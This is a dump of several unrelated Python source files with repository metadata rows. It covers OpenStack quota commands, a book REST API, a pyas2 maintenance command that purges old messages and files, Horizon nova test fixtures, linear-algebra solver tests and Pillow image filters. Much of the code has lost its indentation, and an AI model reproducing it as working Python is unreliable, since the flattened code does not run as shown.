k = k + '_%s' % parsed_args.volume_type
volume_kwargs[k] = value
if compute_kwargs == {} and volume_kwargs == {}:
sys.stderr.write("No quotas updated")
return
if parsed_args.quota_class:
if compute_kwargs:
compute_client.quota_classes.update(
parsed_args.project,
**compute_kwargs)
if volume_kwargs:
volume_client.quota_classes.update(
parsed_args.project,
**volume_kwargs)
else:
if compute_kwargs:
compute_client.quotas.update(
parsed_args.project,
**compute_kwargs)
if volume_kwargs:
volume_client.quotas.update(
parsed_args.project,
**volume_kwargs)
class ShowQuota(show.ShowOne):
"""Show quotas for project or class"""
log = logging.getLogger(__name__ + '.ShowQuota')
def get_parser(self, prog_name):
parser = super(ShowQuota, self).get_parser(prog_name)
parser.add_argument(
'project',
metavar='<project/class>',
help='Show this project or class (name/ID)',
)
type_group = parser.add_mutually_exclusive_group()
type_group.add_argument(
'--class',
dest='quota_class',
action='store_true',
default=False,
help='Show quotas for <class>',
)
type_group.add_argument(
'--default',
dest='default',
action='store_true',
default=False,
help='Show default quotas for <project>'
)
return parser
def get_compute_volume_quota(self, client, parsed_args):
try:
if parsed_args.quota_class:
quota = client.quota_classes.get(parsed_args.project)
elif parsed_args.default:
quota = client.quotas.defaults(parsed_args.project)
else:
quota = client.quotas.get(parsed_args.project)
except Exception as e:
if type(e).__name__ == 'EndpointNotFound':
return {}
else:
raise e
return quota._info
def get_network_quota(self, parsed_args):
if parsed_args.quota_class or parsed_args.default:
return {}
service_catalog = self.app.client_manager.auth_ref.service_catalog
if 'network' in service_catalog.get_endpoints():
network_client = self.app.client_manager.network
return network_client.show_quota(parsed_args.project)['quota']
else:
return {}
@utils.log_method(log)
def take_action(self, parsed_args):
compute_client = self.app.client_manager.compute
volume_client = self.app.client_manager.volume
# NOTE(dtroyer): These quota API calls do not validate the project
# or class arguments and return what appears to be
# the default quota values if the project or class
# does not exist. If this is determined to be the
# intended behaviour of the API we will validate
# the argument with Identity ourselves later.
compute_quota_info = self.get_compute_volume_quota(compute_client,
parsed_args)
volume_quota_info = self.get_compute_volume_quota(volume_client,
parsed_args)
network_quota_info = self.get_network_quota(parsed_args)
info = {}
info.update(compute_quota_info)
info.update(volume_quota_info)
info.update(network_quota_info)
# Map the internal quota names to the external ones
# COMPUTE_QUOTAS and NETWORK_QUOTAS share floating-ips,
# secgroup-rules and secgroups as dict value, so when
# neutron is enabled, quotas of these three resources
# in nova will be replaced by neutron's.
for k, v in itertools.chain(
COMPUTE_QUOTAS.items(), VOLUME_QUOTAS.items(),
NETWORK_QUOTAS.items()):
if not k == v and info.get(k):
info[v] = info[k]
info.pop(k)
# Handle project ID special as it only appears in output
if 'id' in info:
info['project'] = info.pop('id')
return zip(*sorted(six.iteritems(info)))
| mit | -5,707,946,925,653,465,000 | 33.169565 | 77 | 0.56254 | false |
marcosxddh/aula_script | backend/appengine/routes/books/rest.py | 1 | 1044 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaebusiness.business import CommandExecutionException
from tekton.gae.middleware.json_middleware import JsonResponse
from book_app import facade
def index():
cmd = facade.list_books_cmd()
book_list = cmd()
    short_form = facade.book_short_form()
book_short = [short_form.fill_with_model(m) for m in book_list]
return JsonResponse(book_short)
def save(**book_properties):
cmd = facade.save_book_cmd(**book_properties)
return _save_or_update_json_response(cmd)
def update(book_id, **book_properties):
cmd = facade.update_book_cmd(book_id, **book_properties)
return _save_or_update_json_response(cmd)
def delete(book_id):
facade.delete_book_cmd(book_id)()
def _save_or_update_json_response(cmd):
try:
book = cmd()
except CommandExecutionException:
return JsonResponse({'errors': cmd.errors})
    short_form = facade.book_short_form()
return JsonResponse(short_form.fill_with_model(book))
| mit | 2,769,724,432,939,574,300 | 27.216216 | 67 | 0.704981 | false |
abhishek-ram/pyas2 | pyas2/management/commands/cleanas2server.py | 1 | 3094 | from django.core.management.base import BaseCommand
from django.utils.translation import ugettext as _
from datetime import timedelta
from django.utils import timezone
from pyas2 import models
from pyas2 import pyas2init
import os
import glob
class Command(BaseCommand):
help = _(u'Automatic maintenance for the AS2 server. '
u'Cleans up all the old logs, messages and archived files.')
def handle(self, *args, **options):
pyas2init.logger.info(_(u'Automatic maintenance process started'))
max_archive_dt = timezone.now() - timedelta(
pyas2init.gsettings['max_arch_days'])
max_archive_ts = int(max_archive_dt.strftime("%s"))
pyas2init.logger.info(
_(u'Delete all DB Objects older than max archive days'))
old_message = models.Message.objects.filter(
timestamp__lt=max_archive_dt).order_by('timestamp')
for message in old_message:
pyas2init.logger.debug(
_(u'Delete Message {} and all related '
u'objects'.format(message)))
if message.payload:
message.payload.delete()
if message.mdn:
message.mdn.delete()
message.delete()
pyas2init.logger.info(
_(u'Delete all logs older than max archive days'))
log_folder = os.path.join(pyas2init.gsettings['log_dir'], 'pyas2*')
        for logfile in glob.iglob(log_folder):
            # glob already yields the file's full path, so use it directly
            filename = logfile
            if os.path.getmtime(filename) < max_archive_ts:
pyas2init.logger.debug(
_(u'Delete Log file {}'.format(filename)))
os.remove(filename)
pyas2init.logger.info(
_(u'Delete all Archive Files older than max archive days'))
archive_folders = [
pyas2init.gsettings['payload_send_store'],
pyas2init.gsettings['payload_receive_store'],
pyas2init.gsettings['mdn_send_store'],
pyas2init.gsettings['mdn_receive_store']
]
for archive_folder in archive_folders:
for (dir_path, dir_names, arch_files) in os.walk(archive_folder):
if len(arch_files) > 0:
for arch_file in arch_files:
filename = os.path.join(dir_path, arch_file)
if os.path.getmtime(filename) < max_archive_ts:
pyas2init.logger.debug(_(u'Delete Archive file '
u'{}'.format(filename)))
os.remove(filename)
# Delete the folder if it is empty
try:
os.rmdir(dir_path)
pyas2init.logger.debug(_(u'Delete Empty Archive folder'
u' {}'.format(dir_path)))
except OSError:
pass
pyas2init.logger.info(_(u'Automatic maintenance process completed'))
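# Illustrative invocation (a sketch, not part of the module): the command is
# normally run from the Django project root, either by hand or from a
# scheduler, e.g.
#
#     python manage.py cleanas2server
#
# A daily cron entry such as "0 2 * * * python /path/to/manage.py
# cleanas2server" is one possible schedule; the path and timing are examples.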
| gpl-2.0 | 1,272,911,551,532,576,500 | 42.577465 | 79 | 0.555268 | false |
tuskar/tuskar-ui | openstack_dashboard/test/test_data/nova_data.py | 1 | 22432 | # Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import uuid
from novaclient.v1_1 import aggregates
from novaclient.v1_1 import availability_zones
from novaclient.v1_1 import certs
from novaclient.v1_1 import flavors
from novaclient.v1_1 import floating_ips
from novaclient.v1_1 import hypervisors
from novaclient.v1_1 import keypairs
from novaclient.v1_1 import quotas
from novaclient.v1_1 import security_group_rules as rules
from novaclient.v1_1 import security_groups as sec_groups
from novaclient.v1_1 import servers
from novaclient.v1_1 import services
from novaclient.v1_1 import usage
from novaclient.v1_1 import volume_snapshots as vol_snaps
from novaclient.v1_1 import volume_types
from novaclient.v1_1 import volumes
from openstack_dashboard.api.base import Quota
from openstack_dashboard.api.base import QuotaSet as QuotaSetWrapper
from openstack_dashboard.api.nova import FloatingIp as NetFloatingIp
from openstack_dashboard.usage.quotas import QuotaUsage
from openstack_dashboard.test.test_data.utils import TestDataContainer
SERVER_DATA = """
{
"server": {
"OS-EXT-SRV-ATTR:instance_name": "instance-00000005",
"OS-EXT-SRV-ATTR:host": "instance-host",
"OS-EXT-STS:task_state": null,
"addresses": {
"private": [
{
"version": 4,
"addr": "10.0.0.1"
}
]
},
"links": [
{
"href": "%(host)s/v1.1/%(tenant_id)s/servers/%(server_id)s",
"rel": "self"
},
{
"href": "%(host)s/%(tenant_id)s/servers/%(server_id)s",
"rel": "bookmark"
}
],
"image": {
"id": "%(image_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/images/%(image_id)s",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:vm_state": "active",
"flavor": {
"id": "%(flavor_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/flavors/%(flavor_id)s",
"rel": "bookmark"
}
]
},
"id": "%(server_id)s",
"user_id": "%(user_id)s",
"OS-DCF:diskConfig": "MANUAL",
"accessIPv4": "",
"accessIPv6": "",
"progress": null,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"status": "%(status)s",
"updated": "2012-02-28T19:51:27Z",
"hostId": "c461ea283faa0ab5d777073c93b126c68139e4e45934d4fc37e403c2",
"key_name": "%(key_name)s",
"name": "%(name)s",
"created": "2012-02-28T19:51:17Z",
"tenant_id": "%(tenant_id)s",
"metadata": {"someMetaLabel": "someMetaData",
"some<b>html</b>label": "<!--",
"empty": ""}
}
}
"""
USAGE_DATA = """
{
"total_memory_mb_usage": 64246.89777777778,
"total_vcpus_usage": 125.48222222222223,
"total_hours": 125.48222222222223,
"total_local_gb_usage": 0,
"tenant_id": "%(tenant_id)s",
"stop": "2012-01-31 23:59:59",
"start": "2012-01-01 00:00:00",
"server_usages": [
{
"memory_mb": %(flavor_ram)s,
"uptime": 442321,
"started_at": "2012-01-26 20:38:21",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 122.87361111111112,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
},
{
"memory_mb": %(flavor_ram)s,
"uptime": 9367,
"started_at": "2012-01-31 20:54:15",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 2.608611111111111,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
}
]
}
"""
def data(TEST):
TEST.servers = TestDataContainer()
TEST.flavors = TestDataContainer()
TEST.keypairs = TestDataContainer()
TEST.security_groups = TestDataContainer()
TEST.security_groups_uuid = TestDataContainer()
TEST.security_group_rules = TestDataContainer()
TEST.security_group_rules_uuid = TestDataContainer()
TEST.volumes = TestDataContainer()
TEST.quotas = TestDataContainer()
TEST.quota_usages = TestDataContainer()
TEST.floating_ips = TestDataContainer()
TEST.floating_ips_uuid = TestDataContainer()
TEST.usages = TestDataContainer()
TEST.certs = TestDataContainer()
TEST.volume_snapshots = TestDataContainer()
TEST.volume_types = TestDataContainer()
TEST.availability_zones = TestDataContainer()
TEST.hypervisors = TestDataContainer()
TEST.services = TestDataContainer()
TEST.aggregates = TestDataContainer()
# Data return by novaclient.
# It is used if API layer does data conversion.
TEST.api_floating_ips = TestDataContainer()
TEST.api_floating_ips_uuid = TestDataContainer()
# Volumes
volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="41023e92-8008-4c8b-8059-7f2293ff3775",
name='test_volume',
status='available',
size=40,
display_name='Volume name',
created_at='2012-04-01 10:30:00',
volume_type=None,
attachments=[]))
nameless_volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="3b189ac8-9166-ac7f-90c9-16c8bf9e01ac",
name='',
status='in-use',
size=10,
display_name='',
display_description='',
device="/dev/hda",
created_at='2010-11-21 18:34:25',
volume_type='vol_type_1',
attachments=[{"id": "1", "server_id": '1',
"device": "/dev/hda"}]))
attached_volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="8cba67c1-2741-6c79-5ab6-9c2bf8c96ab0",
name='my_volume',
status='in-use',
size=30,
display_name='My Volume',
display_description='',
device="/dev/hdk",
created_at='2011-05-01 11:54:33',
volume_type='vol_type_2',
attachments=[{"id": "2", "server_id": '1',
"device": "/dev/hdk"}]))
TEST.volumes.add(volume)
TEST.volumes.add(nameless_volume)
TEST.volumes.add(attached_volume)
vol_type1 = volume_types.VolumeType(volume_types.VolumeTypeManager(None),
{'id': 1,
'name': 'vol_type_1'})
vol_type2 = volume_types.VolumeType(volume_types.VolumeTypeManager(None),
{'id': 2,
'name': 'vol_type_2'})
TEST.volume_types.add(vol_type1, vol_type2)
# Flavors
flavor_1 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
'name': 'm1.tiny',
'vcpus': 1,
'disk': 0,
'ram': 512,
'swap': 0,
'extra_specs': {},
'OS-FLV-EXT-DATA:ephemeral': 0})
flavor_2 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb",
'name': 'm1.massive',
'vcpus': 1000,
'disk': 1024,
'ram': 10000,
'swap': 0,
'extra_specs': {'Trusted': True, 'foo': 'bar'},
'OS-FLV-EXT-DATA:ephemeral': 2048})
TEST.flavors.add(flavor_1, flavor_2)
# Keypairs
keypair = keypairs.Keypair(keypairs.KeypairManager(None),
dict(name='keyName'))
TEST.keypairs.add(keypair)
# Security Groups and Rules
def generate_security_groups(is_uuid=False):
def get_id(is_uuid):
if is_uuid:
return str(uuid.uuid4())
else:
get_id.current_int_id += 1
return get_id.current_int_id
get_id.current_int_id = 0
sg_manager = sec_groups.SecurityGroupManager(None)
rule_manager = rules.SecurityGroupRuleManager(None)
sec_group_1 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"default",
"description": u"default"})
sec_group_2 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"other_group",
"description": u"NotDefault."})
sec_group_3 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"another_group",
"description": u"NotDefault."})
rule = {'id': get_id(is_uuid),
'group': {},
'ip_protocol': u"tcp",
'from_port': u"80",
'to_port': u"80",
'parent_group_id': sec_group_1.id,
'ip_range': {'cidr': u"0.0.0.0/32"}}
icmp_rule = {'id': get_id(is_uuid),
'group': {},
'ip_protocol': u"icmp",
'from_port': u"9",
'to_port': u"5",
'parent_group_id': sec_group_1.id,
'ip_range': {'cidr': u"0.0.0.0/32"}}
group_rule = {'id': 3,
'group': {},
'ip_protocol': u"tcp",
'from_port': u"80",
'to_port': u"80",
'parent_group_id': sec_group_1.id,
'source_group_id': sec_group_1.id}
rule_obj = rules.SecurityGroupRule(rule_manager, rule)
rule_obj2 = rules.SecurityGroupRule(rule_manager, icmp_rule)
rule_obj3 = rules.SecurityGroupRule(rule_manager, group_rule)
sec_group_1.rules = [rule_obj]
sec_group_2.rules = [rule_obj]
return {"rules": [rule_obj, rule_obj2, rule_obj3],
"groups": [sec_group_1, sec_group_2, sec_group_3]}
sg_data = generate_security_groups()
TEST.security_group_rules.add(*sg_data["rules"])
TEST.security_groups.add(*sg_data["groups"])
sg_uuid_data = generate_security_groups(is_uuid=True)
TEST.security_group_rules_uuid.add(*sg_uuid_data["rules"])
TEST.security_groups_uuid.add(*sg_uuid_data["groups"])
# Quota Sets
quota_data = dict(metadata_items='1',
injected_file_content_bytes='1',
volumes='1',
gigabytes='1000',
ram=10000,
floating_ips='1',
fixed_ips='10',
instances='10',
injected_files='1',
cores='10',
security_groups='10',
security_group_rules='20')
quota = quotas.QuotaSet(quotas.QuotaSetManager(None), quota_data)
TEST.quotas.nova = QuotaSetWrapper(quota)
TEST.quotas.add(QuotaSetWrapper(quota))
# Quota Usages
quota_usage_data = {'gigabytes': {'used': 0,
'quota': 1000},
'instances': {'used': 0,
'quota': 10},
'ram': {'used': 0,
'quota': 10000},
'cores': {'used': 0,
'quota': 20}}
quota_usage = QuotaUsage()
for k, v in quota_usage_data.items():
quota_usage.add_quota(Quota(k, v['quota']))
quota_usage.tally(k, v['used'])
TEST.quota_usages.add(quota_usage)
# Limits
limits = {"absolute": {"maxImageMeta": 128,
"maxPersonality": 5,
"maxPersonalitySize": 10240,
"maxSecurityGroupRules": 20,
"maxSecurityGroups": 10,
"maxServerMeta": 128,
"maxTotalCores": 20,
"maxTotalFloatingIps": 10,
"maxTotalInstances": 10,
"maxTotalKeypairs": 100,
"maxTotalRAMSize": 10000,
"totalCoresUsed": 0,
"totalInstancesUsed": 0,
"totalKeyPairsUsed": 0,
"totalRAMUsed": 0,
"totalSecurityGroupsUsed": 0}}
TEST.limits = limits
# Servers
tenant3 = TEST.tenants.list()[2]
vals = {"host": "http://nova.example.com:8774",
"name": "server_1",
"status": "ACTIVE",
"tenant_id": TEST.tenants.first().id,
"user_id": TEST.user.id,
"server_id": "1",
"flavor_id": flavor_1.id,
"image_id": TEST.images.first().id,
"key_name": keypair.name}
server_1 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
vals.update({"name": "server_2",
"status": "BUILD",
"server_id": "2"})
server_2 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
vals.update({"name": u'\u4e91\u89c4\u5219',
"status": "ACTIVE",
"tenant_id": tenant3.id,
"server_id": "3"})
server_3 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
TEST.servers.add(server_1, server_2, server_3)
# VNC Console Data
console = {u'console': {u'url': u'http://example.com:6080/vnc_auto.html',
u'type': u'novnc'}}
TEST.servers.vnc_console_data = console
# SPICE Console Data
console = {u'console': {u'url': u'http://example.com:6080/spice_auto.html',
u'type': u'spice'}}
TEST.servers.spice_console_data = console
# Floating IPs
def generate_fip(conf):
return floating_ips.FloatingIP(floating_ips.FloatingIPManager(None),
conf)
fip_1 = {'id': 1,
'fixed_ip': '10.0.0.4',
'instance_id': server_1.id,
'ip': '58.58.58.58',
'pool': 'pool1'}
fip_2 = {'id': 2,
'fixed_ip': None,
'instance_id': None,
'ip': '58.58.58.58',
'pool': 'pool2'}
TEST.api_floating_ips.add(generate_fip(fip_1), generate_fip(fip_2))
TEST.floating_ips.add(NetFloatingIp(generate_fip(fip_1)),
NetFloatingIp(generate_fip(fip_2)))
# Floating IP with UUID id (for Floating IP with Neutron Proxy)
fip_3 = {'id': str(uuid.uuid4()),
'fixed_ip': '10.0.0.4',
'instance_id': server_1.id,
'ip': '58.58.58.58',
'pool': 'pool1'}
fip_4 = {'id': str(uuid.uuid4()),
'fixed_ip': None,
'instance_id': None,
'ip': '58.58.58.58',
'pool': 'pool2'}
TEST.api_floating_ips_uuid.add(generate_fip(fip_3), generate_fip(fip_4))
TEST.floating_ips_uuid.add(NetFloatingIp(generate_fip(fip_3)),
NetFloatingIp(generate_fip(fip_4)))
# Usage
usage_vals = {"tenant_id": TEST.tenant.id,
"instance_name": server_1.name,
"flavor_name": flavor_1.name,
"flavor_vcpus": flavor_1.vcpus,
"flavor_disk": flavor_1.disk,
"flavor_ram": flavor_1.ram}
usage_obj = usage.Usage(usage.UsageManager(None),
json.loads(USAGE_DATA % usage_vals))
TEST.usages.add(usage_obj)
usage_2_vals = {"tenant_id": tenant3.id,
"instance_name": server_3.name,
"flavor_name": flavor_1.name,
"flavor_vcpus": flavor_1.vcpus,
"flavor_disk": flavor_1.disk,
"flavor_ram": flavor_1.ram}
usage_obj_2 = usage.Usage(usage.UsageManager(None),
json.loads(USAGE_DATA % usage_2_vals))
TEST.usages.add(usage_obj_2)
volume_snapshot = vol_snaps.Snapshot(vol_snaps.SnapshotManager(None),
{'id': '40f3fabf-3613-4f5e-90e5-6c9a08333fc3',
'display_name': 'test snapshot',
'display_description': 'vol snap!',
'size': 40,
'status': 'available',
'volume_id': '41023e92-8008-4c8b-8059-7f2293ff3775'})
TEST.volume_snapshots.add(volume_snapshot)
cert_data = {'private_key': 'private',
'data': 'certificate_data'}
certificate = certs.Certificate(certs.CertificateManager(None), cert_data)
TEST.certs.add(certificate)
# Availability Zones
TEST.availability_zones.add(
availability_zones.AvailabilityZone(
availability_zones.AvailabilityZoneManager(None),
{'zoneName': 'nova', 'zoneState': {'available': True}}
)
)
# hypervisors
hypervisor_1 = hypervisors.Hypervisor(hypervisors.HypervisorManager(None),
{
"service": {"host": "devstack001", "id": 3},
"vcpus_used": 1,
"hypervisor_type": "QEMU",
"local_gb_used": 20,
"hypervisor_hostname": "devstack001",
"memory_mb_used": 1500,
"memory_mb": 2000,
"current_workload": 0,
"vcpus": 1,
"cpu_info": '{"vendor": "Intel", "model": "core2duo",'
'"arch": "x86_64", "features": ["lahf_lm"'
', "rdtscp"], "topology": {"cores": 1, "t'
'hreads": 1, "sockets": 1}}',
"running_vms": 1,
"free_disk_gb": 9,
"hypervisor_version": 1002000,
"disk_available_least": 6,
"local_gb": 29,
"free_ram_mb": 500,
"id": 1
}
)
TEST.hypervisors.add(hypervisor_1)
# Services
service_1 = services.Service(services.ServiceManager(None),
{
"status": "enabled",
"binary": "nova-conductor",
"zone": "internal",
"state": "up",
"updated_at": "2013-07-08T05:21:00.000000",
"host": "devstack001",
"disabled_reason": None
}
)
service_2 = services.Service(services.ServiceManager(None),
{
"status": "enabled",
"binary": "nova-compute",
"zone": "nova",
"state": "up",
"updated_at": "2013-07-08T05:20:51.000000",
"host": "devstack001",
"disabled_reason": None
}
)
TEST.services.add(service_1)
TEST.services.add(service_2)
# Aggregates
aggregate_1 = aggregates.Aggregate(aggregates.AggregateManager(None),
{
"name": "foo",
"availability_zone": None,
"deleted": 0,
"created_at": "2013-07-04T13:34:38.000000",
"updated_at": None,
"hosts": ["foo", "bar"],
"deleted_at": None,
"id": 1,
"metadata": {
"foo": "testing",
"bar": "testing"
}
}
)
aggregate_2 = aggregates.Aggregate(aggregates.AggregateManager(None),
{
"name": "bar",
"availability_zone": "testing",
"deleted": 0,
"created_at": "2013-07-04T13:34:38.000000",
"updated_at": None,
"hosts": ["foo", "bar"],
"deleted_at": None,
"id": 2,
"metadata": {
"foo": "testing",
"bar": "testing"
}
}
)
TEST.aggregates.add(aggregate_1)
TEST.aggregates.add(aggregate_2)
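# Usage sketch (illustrative, not part of the fixture module): after data(TEST)
# has populated the containers, tests read the fixtures back through them, e.g.
#
#     server = TEST.servers.first()     # the "server_1" instance built above
#     flavors = TEST.flavors.list()     # [m1.tiny, m1.massive]
#     quota = TEST.quotas.first()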
| apache-2.0 | 3,151,234,665,979,034,000 | 37.476844 | 79 | 0.471113 | false |
kewitz/algebralinear | teste.py | 1 | 2593 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2014 Leonardo Kewitz
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__version__ = "0.1.00"
__author__ = "kewitz"
__license__ = "MIT"
from numpy import matrix, array, testing
import unittest
import matrixlib as ml
def getAB():
A = matrix([[10., -1., 2., 0.],
[-1., 11., -1., 3.],
[2., -1., 10., -1.],
[0.0, 3., -1., 8.]])
b = array([6., 25., -11., 15.])
return A, b
class LUTest(unittest.TestCase):
def setUp(self):
self.A, self.b = getAB()
def testLUeA(self):
L, U = ml.LUCroutDecompose(self.A)
A2 = L.dot(U)
testing.assert_almost_equal(self.A, A2)
def testSolver(self):
LU = ml.LUCroutInplaceDecompose(self.A)
x = ml.LUSolve(LU, self.b)
testing.assert_almost_equal(x, [1., 2., -1., 1.])
class GaussJordanTest(unittest.TestCase):
def setUp(self):
self.A, self.b = getAB()
def test(self):
x = ml.GaussJordan(self.A, self.b)
testing.assert_almost_equal(x, [1., 2., -1., 1.])
class JacobiTest(unittest.TestCase):
def setUp(self):
self.A, self.b = getAB()
def test(self):
x = ml.Jacobi(self.A, self.b, 20)
testing.assert_almost_equal(x, [1., 2., -1., 1.])
class GaussSeidelTest(unittest.TestCase):
def setUp(self):
self.A, self.b = getAB()
def test(self):
x = ml.GaussSeidel(self.A, self.b, 10)
testing.assert_almost_equal(x, [1., 2., -1., 1.])
if __name__ == "__main__":
unittest.main()
| mit | 1,599,712,270,203,300,400 | 29.151163 | 78 | 0.644427 | false |
andela-ggikera/photo-editing-app | editor/photo_effects.py | 1 | 3217 | """Image filter and enhancement helpers built on Pillow (PIL)."""
from PIL import ImageFilter, ImageOps, ImageEnhance
def grayscale(image, name, temp_url):
"""Return an image with a contrast of grey."""
image.seek(0)
photo = ImageOps.grayscale(image)
photo.save(temp_url + "GRAYSCALE" + name)
return temp_url + "GRAYSCALE" + name
def smooth(image, name, temp_url):
"""Return a smoothened image."""
image.seek(0)
photo = image.filter(ImageFilter.SMOOTH)
photo.save(temp_url + "SMOOTH" + name)
return temp_url + "SMOOTH" + name
def contour(image, name, temp_url):
"""Return an image with a contour filter."""
image.seek(0)
photo = image.filter(ImageFilter.CONTOUR)
photo.save(temp_url + "CONTOUR" + name)
return temp_url + "CONTOUR" + name
def sharpen(image, name, temp_url):
"""Return a sharpened image."""
image.seek(0)
photo = image.filter(ImageFilter.SHARPEN)
photo.save(temp_url + "SHARPEN" + name)
return temp_url + "SHARPEN" + name
def detail(image, name, temp_url):
"""Return an image with edge enhancement."""
image.seek(0)
photo = image.filter(ImageFilter.EDGE_ENHANCE)
photo.save(temp_url + "DETAIL" + name)
return temp_url + "DETAIL" + name
def flip(image, name, temp_url):
"""Flip an image."""
image.seek(0)
photo = ImageOps.flip(image)
photo.save(temp_url + "FLIP" + name)
return temp_url + "FLIP" + name
def invert(image, name, temp_url):
"""Invert an image."""
image.seek(0)
photo = ImageOps.invert(image)
photo.save(temp_url + "INVERT" + name)
return temp_url + "INVERT" + name
def mirror(image, name, temp_url):
"""Flip the image horizontally."""
image.seek(0)
photo = ImageOps.mirror(image)
photo.save(temp_url + "MIRROR" + name)
return temp_url + "MIRROR" + name
def contrast(image, name, temp_url):
"""Increase the contrast of an image and return the enhanced image."""
image.seek(0)
photo = ImageEnhance.Contrast(image)
photo = photo.enhance(1.5)
photo.save(temp_url + "CONTRAST" + name)
return temp_url + "CONTRAST" + name
def blur(image, name, temp_url):
"""Return a blur image using a gaussian blur filter."""
image.seek(0)
photo = image.filter(
ImageFilter.GaussianBlur(radius=3))
photo.save(temp_url + "BLUR" + name)
return temp_url + "BLUR" + name
def brighten(image, name, temp_url):
"""Return an image with a brightness enhancement factor of 1.5."""
image.seek(0)
photo = ImageEnhance.Brightness(image)
photo = photo.enhance(1.5)
photo.save(temp_url + "BRIGHTEN" + name)
return temp_url + "BRIGHTEN" + name
def darken(image, name, temp_url):
"""Return an image with a brightness enhancement factor of 0.5."""
image.seek(0)
photo = ImageEnhance.Brightness(image)
photo = photo.enhance(0.5)
    photo.save(temp_url + "DARKEN" + name)
    return temp_url + "DARKEN" + name
def saturate(image, name, temp_url):
"""Return an image with a saturation enhancement factor of 2.0 ."""
image.seek(0)
photo = ImageEnhance.Color(image)
photo = photo.enhance(2.0)
photo.save(temp_url + "SATURATE" + name)
return temp_url + "SATURATE" + name
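# Usage sketch (an assumption about the calling view, not part of this module):
# each helper expects an open PIL Image, the original file name and a writable
# directory prefix, and returns the path of the processed copy, e.g.
#
#     from PIL import Image
#     img = Image.open("photo.jpg")                    # illustrative file name
#     preview = grayscale(img, "photo.jpg", "/tmp/previews/")
#     # preview == "/tmp/previews/GRAYSCALEphoto.jpg"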
| mit | 837,746,076,482,372,200 | 27.981982 | 74 | 0.646254 | false |